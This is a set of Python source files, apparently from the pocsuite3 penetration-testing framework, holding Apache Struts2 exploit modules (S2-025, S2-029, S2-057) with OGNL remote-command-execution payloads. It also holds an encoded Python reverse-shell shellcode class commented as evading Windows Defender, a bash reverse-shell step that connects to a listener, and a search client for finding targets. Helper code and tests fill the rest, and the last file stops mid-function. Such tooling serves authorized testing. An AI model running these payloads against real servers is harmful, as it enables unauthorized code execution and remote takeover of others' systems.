from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-025']
    name = 'Apache Struts2 s2-025'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts Struts 2.3.16.3'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-devMode:影响版本Struts 2.0.0 - Struts Struts 2.3.16.3'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        headers = {
            "Content-Type": 'application/x-www-form-urlencoded'
        }
        exec_payload = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command={cmd}"
        flag = random_str(5)
        exec_payload = exec_payload.format(cmd=quote("echo {};".format(flag)))
        html = requests.get(self.url + exec_payload, headers=headers).text
        if flag in html:
            result["VerifyInfo"] = {
                "URL": self.url,
            }
            return result
        return False

    def _attack(self):
        p = self._check()
        result = {}
        if p:
            headers = {
                "Content-Type": 'application/x-www-form-urlencoded'
            }
            exec_payload = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command={cmd}"
            cmd = self.get_option("command")
            exec_payload = exec_payload.format(cmd=quote("{}".format(cmd)))
            html = requests.get(self.url + exec_payload, headers=headers).text
            if html:
                result["VerifyInfo"] = {
                    "result": html.replace("\x00", "").encode(),
                }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



from http.client import HTTPException


class PocsuiteBaseException(Exception):
    pass


class PocsuiteUserQuitException(PocsuiteBaseException):
    pass


class PocsuiteShellQuitException(PocsuiteBaseException):
    pass


class PocsuiteDataException(PocsuiteBaseException):
    pass


class PocsuiteGenericException(PocsuiteBaseException):
    pass


class PocsuiteSystemException(PocsuiteBaseException):
    pass


class PocsuiteFilePathException(PocsuiteBaseException):
    pass


class PocsuiteConnectionException(PocsuiteBaseException):
    pass


class PocsuiteThreadException(PocsuiteBaseException):
    pass


class PocsuiteValueException(PocsuiteBaseException):
    pass


class PocsuiteMissingPrivileges(PocsuiteBaseException):
    pass


class PocsuiteSyntaxException(PocsuiteBaseException):
    pass


class PocsuiteValidationException(PocsuiteBaseException):
    pass


class PocsuiteMissingMandatoryOptionException(PocsuiteBaseException):
    pass


class PocsuitePluginBaseException(PocsuiteBaseException):
    pass


class PocsuitePluginDorkException(PocsuitePluginBaseException):
    pass


class PocsuiteHeaderTypeException(PocsuiteBaseException):
    pass


class PocsuiteIncompleteRead(HTTPException):
    def __init__(self, partial, expected=None):
        self.args = partial,
        self.partial = partial
        self.expected = expected

    def __repr__(self):
        if self.expected is not None:
            e = ', %i more expected' % self.expected
        else:
            e = ''
        return '%s(%i bytes read%s)' % (self.__class__.__name__,
                                        len(self.partial), e)

    def __str__(self):
        return repr(self)



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str, get_middle_text


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-029']
    name = 'Apache Struts2 s2-029'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.24.1 (except 2.3.20.3)'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-029:影响版本Struts 2.0.0-2.3.24.1(除了2.3.20.3); '''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        exec_payload = "?message=(%23_memberAccess%5B'allowPrivateAccess'%5D=true,%23_memberAccess%5B'allowProtectedAccess'%5D=true,%23_memberAccess%5B'excludedPackageNamePatterns'%5D=%23_memberAccess%5B'acceptProperties'%5D,%23_memberAccess%5B'excludedClasses'%5D=%23_memberAccess%5B'acceptProperties'%5D,%23_memberAccess%5B'allowPackageProtectedAccess'%5D=true,%23_memberAccess%5B'allowStaticMethodAccess'%5D=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('{cmd}').getInputStream()))"

        hash_md5 = random_str(5)
        cmd = "echo {};".format(hash_md5)
        html = requests.get(
            self.url + "{payload}".format(payload=exec_payload.format(cmd=quote(cmd)))).text
        if hash_md5 in html:
            result["VerifyInfo"] = {
                "URL": self.url,
            }
            return result
        return False

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            exec_payload = "?message=(%23_memberAccess%5B'allowPrivateAccess'%5D=true,%23_memberAccess%5B'allowProtectedAccess'%5D=true,%23_memberAccess%5B'excludedPackageNamePatterns'%5D=%23_memberAccess%5B'acceptProperties'%5D,%23_memberAccess%5B'excludedClasses'%5D=%23_memberAccess%5B'acceptProperties'%5D,%23_memberAccess%5B'allowPackageProtectedAccess'%5D=true,%23_memberAccess%5B'allowStaticMethodAccess'%5D=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('{cmd}').getInputStream()))"
            cmd = self.get_option("command")
            cmd = "{}".format(cmd)
            html = requests.get(
                self.url + "{payload}".format(payload=exec_payload.format(cmd=quote(cmd)))).text
            result_cmd = get_middle_text(html, "value=\"", "\"")
            if html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "result": result_cmd.replace("\x00", "").encode()
                }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



import zlib
import base64
from .base import ShellCode


class PythonShellCode(ShellCode):
    """
        Class with shellcodes for python language
    """

    def __init__(self, connect_back_ip='localhost', connect_back_port=5555):
        ShellCode.__init__(self, connect_back_ip=connect_back_ip,
                           connect_back_port=connect_back_port)

    def get_python_code(self, bad_chars):
        """
            Function to get python shellcode
        """

        if not self.connect_back_ip or not self.connect_back_port:
            print("Settings for connect back listener must be defined")
            return False

        # compress and base64 encode to bypass windows defender
        python_code = (
            b'eJxtUsFu2zAMvfsrWORgezOctdhpQA5BkGHFuiZofBuGQLY4'
            b'WKgteZKcoijy7yUlNzOK6mLz8fHpkeLiajk6u6yVXg7PvjU6'
            b'Uf1grAdnmkf0hRvrwZoGnUt+7A4VrCB9ebnbbdZ3HJ7PKdBZ'
            b'QNUiWOyNR2iN88l+98DcicrR+Qzwn+tEjxDuEQ5GhxLqZ/Cc'
            b'QHtCmzgqjg7K+MmmaP39eHu/rYq37GG3+Xk8VA/b9a88WUBj'
            b'tMbGgzcgvBdEsdCLplUaE1dO2Sxj7wWwrZyrHGoJTwjC4psC'
            b'SuIznqW/P/2BTUSV0bB1XtSdci3KqzRUe0F9dMYMyVOrOoTr'
            b'b0ns1GKj8ERNtdh1pNz3QsuQk8ILbrEkyim7/nLzNQ/4YJX2'
            b'ITtJqL+gvIN/o/IFD0hDbVE8ghlpdOS66YzDaRihhAqiOL0U'
            b'V6Vg7AxJozc+QWi6RpoPTPLDs8nLCpR7M6DOWK2I/FVlR6R/'
            b'L8nQas683W8DjtZ+iCv9Hs4vUxOS+xvG2FEUP55ENyLZ4ZIy'
            b'YiVTsxw+X0C6bQInsfC0UWy+FFE4PvBcP+zQfKS0NByS3itr'
            b'QQTj'
        )
        python_code = zlib.decompress(base64.b64decode(python_code)).decode()
        python_code = self.format_shellcode(python_code)
        return python_code

    def get_shellcode(self, inline=False):
        shell = self.get_python_code(self.bad_chars)
        if inline:
            shell = self.make_inline(shell)
        return shell



import getpass
import time
import base64
from configparser import ConfigParser
from pocsuite3.lib.core.data import logger, paths
from pocsuite3.lib.request import requests


class Hunter():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
        self.url = 'https://hunter.qianxin.com/openApi/search'
        self.headers = {'User-Agent': 'curl/7.80.0'}
        self.credits = 0
        self.conf_path = conf_path
        self.token = token

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.token = self.token or self.parser.get("Hunter", 'token')
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.token:
            try:
                resp = requests.get(
                    f'{self.url}?api-key={self.token}&search=aXA9IjI1NS4yNTUuMjU1LjI1NSI=&page=1&page_size=1',
                    headers=self.headers)

                if 'rest_quota' not in resp.text:
                    logger.info(resp.text)
                    return False

                self.credits = resp.json()['data']['rest_quota']
                return True
            except Exception as ex:
                logger.error(str(ex))
        return False

    def check_token(self):
        if self.token_is_available():
            return True
        while True:
            new_token = getpass.getpass("Hunter API token: (input will hidden)")
            self.token = new_token
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error("The Hunter api token is incorrect. "
                             "Please enter the correct one.")

    def write_conf(self):
        if not self.parser.has_section("Hunter"):
            self.parser.add_section("Hunter")
        try:
            self.parser.set("Hunter", "Token", self.token)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def search(self, dork, pages=2):
        search_result = set()
        search = base64.urlsafe_b64encode(dork.encode("utf-8")).decode()
        try:
            for page in range(1, pages + 1):
                time.sleep(1)
                resp = requests.get(
                    f'{self.url}?api-key={self.token}&search={search}&page={page}&page_size=20&is_web=3',
                    headers=self.headers, timeout=60)
                if resp and resp.status_code == 200 and resp.json()['code'] == 200:
                    content = resp.json()
                    for i in content['data']['arr']:
                        search_result.add(i['url'])
                else:
                    logger.error("[PLUGIN] Hunter: {}".format(resp.text))
        except Exception as ex:
            logger.error(str(ex))
        return search_result


if __name__ == "__main__":
    ht = Hunter(token="")
    z = ht.search('web.title="Vigor 2960"')
    print(z)



import re
from ast import (
    Module,
    parse,
    walk,
)

from pocsuite3.lib.core.log import LOGGER as logger

AST_NODE_TYPE_ALLOWLIST = [
    'Expr', 'Load', 'Str', 'Num', 'BoolOp', 'Compare', 'And', 'Eq', 'NotEq', 'Or', 'GtE', 'LtE', 'Lt',
    'Gt', 'BinOp', 'Add', 'Div', 'Sub', 'Mult', 'Mod', 'Pow', 'LShift', 'GShift', 'BitAnd', 'BitOr',
    'BitXor', 'UnaryOp', 'Invert', 'Not', 'NotIn', 'In', 'Is', 'IsNot', 'List', 'Index', 'Subscript',
    'Constant', 'Name', 'Call', 'Attribute']

BUILTIN_AND_MATH_FUNCTIONS = [
    'abs', 'all', 'any', 'bin', 'chr', 'cmp', 'complex', 'divmod', 'float', 'hex', 'int', 'len',
    'long', 'max', 'min', 'oct', 'ord', 'pow', 'range', 'reversed', 'round', 'sorted', 'str', 'sum',
    'type', 'unichr', 'unicode', 'log', 'exp', 'sqrt', 'ceil', 'floor']

STRING_AND_LIST_METHODS = [name for name in dir("") + dir([]) if not name.startswith("_")]
VALID_FUNCTIONS = BUILTIN_AND_MATH_FUNCTIONS + STRING_AND_LIST_METHODS


def _check_name(ast_node, allowed_variables=None):
    if allowed_variables is None:
        allowed_variables = []
    name = ast_node.id
    return name in VALID_FUNCTIONS + allowed_variables


def _check_attribute(ast_node):
    attribute_name = ast_node.attr
    if attribute_name not in STRING_AND_LIST_METHODS:
        return False
    return True


def _check_call(ast_node, allowed_variables=None):
    if allowed_variables is None:
        allowed_variables = []
    # If we are calling a function or method, it better be a math,
    # string or list function.
    ast_func = ast_node.func
    ast_func_class = ast_func.__class__.__name__
    if ast_func_class == "Name":
        if ast_func.id not in BUILTIN_AND_MATH_FUNCTIONS + allowed_variables:
            return False
    elif ast_func_class == "Attribute":
        if not _check_attribute(ast_func):
            return False
    else:
        return False

    return True


def _check_expression(text, allowed_variables=None):
    """

    >>> allowed_variables = ["c1", "c2", "c3", "c4", "c5"]
    >>> _check_expression("c1", allowed_variables)
    True
    >>> _check_expression("eval('1+1')", allowed_variables)
    False
    >>> _check_expression("import sys", allowed_variables)
    False
    >>> _check_expression("[].__str__", allowed_variables)
    False
    >>> _check_expression("__builtins__", allowed_variables)
    False
    >>> _check_expression("'x' in globals", allowed_variables)
    False
    >>> _check_expression("'x' in [1,2,3]", allowed_variables)
    True
    >>> _check_expression("c3=='chr1' and c5>5", allowed_variables)
    True
    >>> _check_expression("c3=='chr1' and d5>5", allowed_variables)  # Invalid d5 reference
    False
    >>> _check_expression("c3=='chr1' and c5>5 or exec", allowed_variables)
    False
    >>> _check_expression("type(c1) != type(1)", allowed_variables)
    True
    >>> _check_expression("c1.split(',')[1] == '1'", allowed_variables)
    True
    >>> _check_expression("exec 1", allowed_variables)
    False
    >>> _check_expression("str(c2) in [\\\"a\\\",\\\"b\\\"]", allowed_variables)
    True
    """
    if allowed_variables is None:
        allowed_variables = []
    try:
        module = parse(text)
    except SyntaxError:
        return False

    if not isinstance(module, Module):
        return False
    statements = module.body
    if not len(statements) == 1:
        return False
    expression = statements[0]
    if expression.__class__.__name__ != "Expr":
        return False

    for ast_node in walk(expression):
        ast_node_class = ast_node.__class__.__name__

        # Toss out everything that is not a "simple" expression,
        # imports, error handling, etc...
        if ast_node_class not in AST_NODE_TYPE_ALLOWLIST:
            return False

        # White-list more potentially dangerous types AST elements.
        if ast_node_class == "Name":
            # In order to prevent loading 'exec', 'eval', etc...
            # put string restriction on names allowed.
            if not _check_name(ast_node, allowed_variables):
                return False
        # Check only valid, white-listed functions are called.
        elif ast_node_class == "Call":
            if not _check_call(ast_node, allowed_variables):
                return False
        # Check only valid, white-listed attributes are accessed
        elif ast_node_class == "Attribute":
            if not _check_attribute(ast_node):
                return False

    return True


def convert_logical_operators(expression: str) -> str:
    """
    TODO, needs to be optimized in the future
    https://www.dabeaz.com/ply/ply.html#ply_nn26
    """
    return_bool_func = [
        'compare_versions', 'contains', 'contains_all', 'contains_any', 'regex',
        'starts_with', 'line_starts_with', 'ends_with', 'line_ends_with'
    ]
    expression = re.sub(r'\s+&&\s+', ' and ', expression)
    expression = re.sub(r'\s+\|\|\s+', ' or ', expression)
    for f in return_bool_func:
        expression = re.sub(fr'!\s*{f}\(', f'not {f}(', expression)
    return expression


def safe_eval(expression, variables):
    """

    >>> safe_eval("moo", {"moo": 5})
    5
    >>> exception_thrown = False
    >>> try: safe_eval("moo", {"cow": 5})
    ... except Exception as e: exception_thrown = True
    >>> exception_thrown
    True
    """
    if not _check_expression(expression, allowed_variables=list(variables.keys())):
        new_expression = convert_logical_operators(expression)
        if expression != new_expression:
            logger.debug(f'[+] Expressions convert: {expression} -> {new_expression}')
        expression = new_expression
        if not _check_expression(expression, allowed_variables=list(variables.keys())):
            raise Exception(
                f"Invalid expression {expression}, possibly due to unsupported functions in the template or "
                "unresolved variables. If you suspect this is a Pocsuite3 issue, please submit an issue on GitHub.")
    return eval(expression, globals(), variables)


if __name__ == '__main__':
    print(safe_eval("moo", {"moo": 5}))



import unittest
from pocsuite3.lib.yaml.nuclei.protocols.common.expressions import *


class TestCase(unittest.TestCase):
    def test_base64(self):
        self.assertEqual(base64("Hello"), "SGVsbG8=")

    def test_base64_decode(self):
        self.assertEqual(base64_decode("SGVsbG8="), b"Hello")

    def test_base64_py(self):
        self.assertEqual(base64_py("Hello"), "SGVsbG8=\n")

    def test_concat(self):
        self.assertEqual(concat("Hello", 123, "world"), "Hello123world")

    def test_compare_versions(self):
        self.assertTrue(compare_versions("v1.0.0", ">v0.0.1", "<v1.0.1"))

    def test_contains(self):
        self.assertEqual(contains("Hello", "lo"), True)

    def test_contains_all(self):
        self.assertEqual(contains_all("Hello everyone", "lo", "every"), True)

    def test_contains_any(self):
        self.assertEqual(contains_any("Hello everyone", "abc", "llo"), True)

    def test_dec_to_hex(self):
        self.assertEqual(dec_to_hex(7001), "1b59")

    def test_hex_to_dec(self):
        self.assertEqual(hex_to_dec("ff"), 255)
        self.assertEqual(hex_to_dec("0xff"), 255)

    def test_bin_to_dec(self):
        self.assertEqual(bin_to_dec("0b1010"), 10)
        self.assertEqual(bin_to_dec(1010), 10)

    def test_oct_to_dec(self):
        self.assertEqual(oct_to_dec("0o1234567"), 342391)
        self.assertEqual(oct_to_dec(1234567), 342391)

    @unittest.skip(reason='different output for the same input')
    def test_gzip(self):
        self.assertEqual(base64(gzip("Hello"))[10:], "H4sIAI9GUGMC//NIzcnJBwCCidH3BQAAAA=="[10:])

    def test_gzip_decode(self):
        self.assertEqual(
            gzip_decode(hex_decode("1f8b08000000000000fff248cdc9c907040000ffff8289d1f705000000")),
            b"Hello",
        )

    def test_zlib(self):
        self.assertEqual(base64(zlib("Hello")), "eJzzSM3JyQcABYwB9Q==")

    def test_zlib_decode(self):
        self.assertEqual(zlib_decode(hex_decode("789cf248cdc9c907040000ffff058c01f5")), b"Hello")

    def test_hex_decode(self):
        self.assertEqual(hex_decode("6161"), b"aa")

    def test_hex_encode(self):
        self.assertEqual(hex_encode("aa"), "6161")

    def test_html_escape(self):
        self.assertEqual(html_escape("<body>test</body>"), "&lt;body&gt;test&lt;/body&gt;")

    def test_html_unescape(self):
        self.assertEqual(html_unescape("&lt;body&gt;test&lt;/body&gt;"), "<body>test</body>")

    def test_md5(self):
        self.assertEqual(md5("Hello"), "8b1a9953c4611296a827abf8c47804d7")

    def test_mmh3(self):
        self.assertEqual(mmh3("Hello"), "316307400")

    def test_rand_base(self):
        self.assertRegex(rand_base(5, "abc"), r"[abc]{5}")

    def test_rand_char(self):
        self.assertRegex(rand_char("abc"), r"[abc]")

    def test_rand_int(self):
        self.assertIn(rand_int(1, 10), range(1, 11))

    def test_rand_text_alpha(self):
        self.assertRegex(rand_text_alpha(10, "abc"), r"[^abc]{10}")

    def test_rand_text_alphanumeric(self):
        self.assertRegex(rand_text_alphanumeric(10, "ab12"), r"[^ab12]{10}")

    def test_rand_text_numeric(self):
        self.assertRegex(rand_text_numeric(10, "123"), r"[^123]{10}")

    def test_regex(self):
        self.assertTrue(regex("H([a-z]+)o", "Hello"))

    def test_remove_bad_chars(self):
        self.assertEqual(remove_bad_chars("abcd", "bc"), "ad")

    def test_repeat(self):
        self.assertEqual(repeat("../", 5), "../../../../../")

    def test_replace(self):
        self.assertEqual(replace("Hello", "He", "Ha"), "Hallo")

    def test_replace_regex(self):
        self.assertEqual(replace_regex("He123llo", "(\\d+)", ""), "Hello")

    def test_reverse(self):
        self.assertEqual(reverse("abc"), "cba")

    def test_sha1(self):
        self.assertEqual(sha1("Hello"), "f7ff9e8b7bb2e09b70935a5d785e0cc5d9d0abf0")

    def test_sha256(self):
        self.assertEqual(
            sha256("Hello"),
            "185f8db32271fe25f561a6fc938b2e264306ec304eda518007d1764826381969",
        )

    def test_to_lower(self):
        self.assertEqual(to_lower("HELLO"), "hello")

    def test_to_upper(self):
        self.assertEqual(to_upper("hello"), "HELLO")

    def test_trim(self):
        self.assertEqual(trim("aaaHelloddd", "ad"), "Hello")

    def test_trim_left(self):
        self.assertEqual(trim_left("aaaHelloddd", "ad"), "Helloddd")

    def test_trim_prefix(self):
        self.assertEqual(trim_prefix("aaHelloaa", "aa"), "Helloaa")

    def test_trim_right(self):
        self.assertEqual(trim_right("aaaHelloddd", "ad"), "aaaHello")

    def test_trim_space(self):
        self.assertEqual(trim_space(" Hello "), "Hello")

    def test_trim_suffix(self):
        self.assertEqual(trim_suffix("aaHelloaa", "aa"), "aaHello")

    def test_unix_time(self):
        self.assertGreater(unix_time(10), 1639568278)

    def test_url_decode(self):
        self.assertEqual(
            url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1"),
            "https://projectdiscovery.io?test=1",
        )

    def test_url_encode(self):
        self.assertEqual(
            url_encode("https://projectdiscovery.io/test?a=1"),
            "https%3A%2F%2Fprojectdiscovery.io%2Ftest%3Fa%3D1",
        )

    def test_join(self):
        self.assertEqual(join("_", 123, "hello", "world"), "123_hello_world")

    def test_hmac(self):
        self.assertEqual(hmac("sha1", "test", "scrt"), "8856b111056d946d5c6c92a21b43c233596623c6")

    @unittest.skip(reason="timezone")
    def test_date_time(self):
        self.assertEqual(date_time("%Y-%m-%d %H:%M", 1654870680), "2022-06-10 14:18")

    @unittest.skip(reason="timezone")
    def test_to_unix_time(self):
        self.assertEqual(to_unix_time("2022-01-13 16:30:10"), 1642120210)

    def test_starts_with(self):
        self.assertTrue(starts_with("Hello", "e", "He"))

    def test_line_starts_with(self):
        self.assertTrue(line_starts_with("Hi\nHello", "e", "He"))

    def test_ends_with(self):
        self.assertTrue(ends_with("Hello", "e", "lo"))

    def test_line_ends_with(self):
        self.assertTrue(line_ends_with("Hi\nHello", "e", "lo"))


if __name__ == "__main__":
    unittest.main()



from dataclasses import dataclass, field
from enum import Enum
from typing import NewType, Union

StrSlice = NewType('StrSlice', Union[str, list])


class CaseInsensitiveEnum(Enum):
    @classmethod
    def _missing_(cls, value: str):
        for member in cls:
            if member.value == value.lower():
                return member


class Severify(CaseInsensitiveEnum):
    Info = 'info'
    Low = 'low'
    Medium = 'medium'
    High = 'high'
    Critical = 'critical'
    Unknown = 'unknown'


@dataclass
class Classification:
    """Classification contains the vulnerability classification data for a template.
    """
    cve_id: StrSlice = field(default_factory=list)
    cwe_id: StrSlice = field(default_factory=list)
    cvss_metrics: str = ''
    cvss_score: float = 0.0


@dataclass
class Info:
    """Info contains metadata information about a template
    """
    name: str = ''
    author: StrSlice = field(default_factory=list)
    tags: StrSlice = field(default_factory=list)
    description: str = ''
    reference: StrSlice = field(default_factory=list)
    severity: Severify = Severify.Unknown
    metadata: dict = field(default_factory=dict)
    classification: Classification = field(default_factory=Classification)
    remediation: str = ''



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
import base64
import random
import re
import urllib
from collections import OrderedDict
from urllib.parse import urlparse

from pocsuite3.api import Output, POCBase, register_poc, logger, requests, get_listener_ip, get_listener_port
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str
from pocsuite3.modules.listener import REVERSE_PAYLOAD


class DemoPOC(POCBase):
    vulID = '97497'  # ssvid
    version = '3.0'
    author = ['knownsec.com']
    vulDate = '2019-2-12'
    createDate = '2019-2-12'
    updateDate = '2019-2-12'
    references = ['https://www.seebug.org/vuldb/ssvid-97497']
    name = 'Apache Struts2 s2-057'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = '2.3.5-2.3.34, 2.5-2.5.16'
    vulType = VUL_TYPE.CODE_EXECUTION
    suricata_request = '''http.method; content:"GET"; http.uri.raw; url_decode; url_decode; strip_whitespace; content:"${(#"; content:"@"; content:".";'''
    suricata_response = ''''''
    desc = '''
    Struts2在XML配置中如果namespace值未设置且（Action Configuration）中未设置
    或用通配符namespace时可能会导致远程代码执行，当url标签未设置value和action值
    且上层动作未设置或用通配符namespace时也可能会导致远程代码执行
    '''
    samples = []
    install_requires = ['']
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('whoami', description='attack模式自定义命令', require=False)
        return o

    def expolit(self, mode='verify'):
        result = {}
        url = self.url.rstrip('/')
        ognl_payloads = []
        vuls = []
        command = ""
        flag = ""
        try:
            if mode == 'verify':
                num_1 = random.randint(000000000, 999999999)
                num_2 = random.randint(000000000, 999999999)
                flag = str(num_1 + num_2)
                ognl_payload = "%25%7B{0}+{1}%7D".format(str(num_1), str(num_2))

                ognl_payloads.append(ognl_payload)
            elif mode == 'attack' or mode == 'shell':
                flag = random_str()
                if mode == 'attack':
                    command = self.get_option('command')
                else:
                    listener_ip, listener_port = get_listener_ip(), get_listener_port()
                    logger.info("your listener ip and port is: {}:{}".format(listener_ip, listener_port))
                    command = REVERSE_PAYLOAD.BASH.format(listener_ip, listener_port)
                raw_command = command + ' && echo ' + flag
                b64_cmd = base64.b64encode(raw_command.encode()).decode()
                command = "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % b64_cmd
                command = urllib.parse.quote(raw_command)

                ognl_payload1 = "%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context)." \
                                "(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony." \
                                "xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm))." \
                                "(%23a%3D%40java.lang.Runtime%40getRuntime().exec('{}')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D".format(
                    command)

                ognl_payload2 = "%25%7B%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext." \
                                "container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.setExcludedClasses%28%27" \
                                "java.lang.Shutdown%27%29%29.%28%23ou.setExcludedPackageNames%28%27sun.reflect.%27%29%29.%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29." \
                                "%28%23ct.setMemberAccess%28%23dm%29%29.%28%23cmd%3D%27{}%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29." \
                                "contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20" \
                                "java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@" \
                                "getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D".format(
                    urllib.parse.quote(raw_command.replace("%2f", "/")))

                ognl_payload3 = "%25%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23cmd%3D%27{}%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29." \
                                "contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29." \
                                "%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io." \
                                "IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D".format(
                    command)
                ognl_payloads.append(ognl_payload1)
                ognl_payloads.append(ognl_payload2)
                ognl_payloads.append(ognl_payload3)

            pr = urlparse(url)

            if not pr.path.endswith('.action'):
                resp = requests.get(url)
                matchs = re.findall(r'<a.*?href="/?(.*?\.action)', resp.text)
                if matchs:
                    for match in matchs:
                        for ognl_payload in ognl_payloads:
                            temp_path = match.split("/")
                            temp_path.insert(-1, ognl_payload)
                            vul_path = "/".join(temp_path)
                            vuln_url = "{0}://{1}/{2}".format(pr.scheme, pr.netloc, vul_path)
                            vuls.append(vuln_url)
                else:
                    for ognl_payload in ognl_payloads:
                        temp_path = pr.path.split("/")[:-1]
                        temp_path.append(ognl_payload)
                        temp_path.append("index.action")
                        vul_path = "/".join(temp_path)
                        vuln_url = "{0}://{1}/{2}".format(pr.scheme, pr.netloc, vul_path)
                        vuls.append(vuln_url)
            else:
                for ognl_payload in ognl_payloads:
                    temp_path = pr.path.split("/")
                    temp_path.insert(-1, ognl_payload)
                    vul_path = "/".join(temp_path)
                    vuln_url = "{0}://{1}/{2}".format(pr.scheme, pr.netloc, vul_path)
                    vuls.append(vuln_url)
        except Exception as e:
            logger.error(e)

        for vuln_url in vuls:
            try:
                resp = requests.get(vuln_url, allow_redirects=False, timeout=5)
                if resp.status_code == 500:
